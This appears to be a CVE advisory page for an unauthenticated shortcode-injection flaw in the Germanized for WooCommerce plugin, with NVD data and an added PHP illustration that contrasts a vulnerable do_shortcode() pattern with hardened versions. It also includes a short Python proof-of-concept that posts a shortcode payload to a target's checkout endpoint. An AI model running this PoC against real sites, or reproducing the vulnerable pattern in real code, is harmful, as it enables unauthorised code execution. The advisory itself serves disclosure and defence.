Security Vulnerability Report
CVE-2026-2582 CVSS 6.5 MEDIUM

Published: 2026-04-14 07:16:07
Last Modified: 2026-04-22 20:23:16

Description

The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via the 'account_holder' parameter in all versions up to, and including, 3.20.5. The plugin exposes an action, handled in its direct debit gateway (see the referenced lines of class-wc-gzd-gateway-direct-debit.php), that passes the request-supplied value to do_shortcode() without validating it first. Because every shortcode registered on the site (core, theme or any other plugin) then becomes callable through that parameter, unauthenticated attackers can execute arbitrary shortcodes. NVD classifies the weakness as CWE-94 (Improper Control of Generation of Code, 'Code Injection').
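The pattern the description refers to, written out as an added illustration: this is not the plugin's code (the actual lines are linked under References at #L214 and #L982 of class-wc-gzd-gateway-direct-debit.php), and the gzd_demo_* function names, the option name and the exact request handling are assumptions made for the example. The WordPress and WooCommerce functions called (wp_unslash, wc_clean, sanitize_text_field, do_shortcode, strip_shortcodes, esc_html, get_option) are real.

```php
<?php
// Added illustration of the CWE-94 pattern in this advisory; not the plugin's
// own code. The gzd_demo_* names, the option name and the request handling
// are assumptions for the example.

// VULNERABLE PATTERN: a request-supplied value reaches do_shortcode().
// wc_clean() / sanitize_text_field() strip tags and stray bytes but leave
// "[...]" untouched, so "sanitising" first is no defence: every shortcode
// registered on the site becomes callable by an unauthenticated client.
function gzd_demo_render_account_holder_vulnerable() {
    $holder = isset( $_POST['account_holder'] )
        ? wc_clean( wp_unslash( $_POST['account_holder'] ) )
        : '';
    // [gallery], [contact-form-7 id="1"] or any other registered shortcode
    // runs here, with whatever side effects and output it has.
    return do_shortcode( $holder );
}

// HARDENED PATTERN: never hand request data to do_shortcode(). Treat the
// account holder as an opaque string: sanitise on input, escape on output
// and, since a bank account name has no business containing shortcodes,
// strip any registered shortcode tags from it.
function gzd_demo_render_account_holder_hardened() {
    $holder = isset( $_POST['account_holder'] )
        ? sanitize_text_field( wp_unslash( $_POST['account_holder'] ) )
        : '';
    // Removes registered shortcode tags; unknown [text] stays literal text.
    $holder = strip_shortcodes( $holder );
    // Escaped for HTML output; no shortcode processing takes place.
    return esc_html( $holder );
}

// If a template genuinely has to go through do_shortcode(), the template
// must come from trusted (admin-controlled) configuration, and the user
// value must be substituted in only AFTER shortcode processing, so that
// brackets in the user value are never interpreted.
function gzd_demo_render_with_template( $user_value ) {
    // Option name is an assumption for the example.
    $template = get_option( 'gzd_demo_holder_template', 'Account holder: {holder}' );
    $rendered = do_shortcode( $template ); // only trusted text is processed
    return str_replace( '{holder}', esc_html( $user_value ), $rendered );
}
```

The point worth remembering from the vulnerable function is that input sanitisation and shortcode execution are independent: sanitize_text_field() is designed to keep the bracket syntax intact, so the only reliable fix is to keep untrusted strings out of do_shortcode() altogether rather than to filter them on the way in.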

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

Germanized for WooCommerce <= 3.20.5 (version range taken from the CVE description; NVD has not published CPE configuration data for this entry, whose status is "Deferred")

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-2582 Arbitrary Shortcode Execution
# This script demonstrates the vulnerability by sending a payload with a
# malicious shortcode in the 'account_holder' parameter.
import sys

import requests


def exploit(target_url):
    # The vulnerable code lives in the direct debit gateway
    # (includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php).
    # Adjust the endpoint path to match the request that reaches that code
    # on the target installation.
    url = f"{target_url.rstrip('/')}/checkout/"  # Example endpoint, may vary

    # Payload containing a shortcode to be executed.
    # Example: [gallery] or [contact-form-7 id="1"] or any other shortcode
    # registered on the target site.
    shortcode = "[gallery]"
    payload = {
        "account_holder": shortcode,
        # Other parameters required by the form context may need to be added.
    }

    try:
        response = requests.post(url, data=payload, timeout=15)
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")
        return

    if response.status_code != 200:
        print(f"[-] Request failed with status code: {response.status_code}")
        return

    print("[+] Request sent successfully.")
    # If the literal shortcode text comes back unchanged, do_shortcode was not
    # run on it. Its absence alone is not proof of execution (the value may
    # simply not be reflected), so inspect the response for rendered output
    # (e.g. gallery images) before drawing a conclusion.
    if shortcode in response.text:
        print("[-] Shortcode echoed back verbatim; it does not appear to have been processed.")
    else:
        print("[+] Shortcode text not echoed verbatim; check the response for rendered output.")
    print(response.text)


if __name__ == "__main__":
    # Replace with the target URL, or pass it as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://example.com"
    exploit(target)

References

https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L214
https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L982
https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6837ad-576f-4c25-9540-6144ddc8630e?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2582",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2026-04-14T07:16:06.993",
    "lastModified": "2026-04-22T20:23:16.350",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L214",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L982",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6837ad-576f-4c25-9540-6144ddc8630e?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}